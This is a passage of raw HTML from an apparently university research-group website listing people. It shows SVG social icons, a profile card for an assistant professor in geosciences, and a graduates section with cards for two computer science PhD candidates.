h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c479-outer\">\n <div data-colibri-id=\"182-c479\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c479 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c480\" class=\"d-block style-973 style-local-182-c480 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c480-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c480-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c481\" class=\"h-global-transition-all h-heading style-974 style-local-182-c481 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c481\">\n <!---->\n <!---->\n <h4 class=\"\">Taylor Shelton</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c482\" class=\"h-text h-text-component style-975 style-local-182-c482 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c483\" class=\"h-text h-text-component style-976 style-local-182-c483 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c484\" class=\"style-977 style-local-182-c484 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c70\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c70 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c96\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c96 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c97-outer\">\n <div data-colibri-id=\"182-c97\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c97 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c98\" class=\"h-global-transition-all h-heading style-862 style-local-182-c98 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-862 style-local-182-c98\">\n <!---->\n <!---->\n <h2 class=\"\">Graduates</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c71\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c71 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c78-outer\">\n <div data-colibri-id=\"182-c78\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c78 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c79\" class=\"d-block style-854 style-local-182-c79 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c79-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c79-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c80\" class=\"h-global-transition-all h-heading style-850 style-local-182-c80 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c80\">\n <!---->\n <!---->\n <h4 class=\"\">Sundos Al Subhi</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c81\" class=\"h-text h-text-component style-851 style-local-182-c81 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c246\" class=\"h-text h-text-component style-902 style-local-182-c246 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c83\" class=\"style-855 style-local-182-c83 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c72-outer\">\n <div data-colibri-id=\"182-c72\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c72 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c73\" class=\"d-block style-849 style-local-182-c73 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c73-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c73-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c74\" class=\"h-global-transition-all h-heading style-850 style-local-182-c74 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c74\">\n <!---->\n <!---->\n <h4 class=\"\">Aaja Christie</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c75\" class=\"h-text h-text-component style-851 style-local-182-c75 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c245\" class=\"h-text h-text-component style-901 style-local-182-c245 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c77\" class=\"style-853 style-local-182-c77 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n 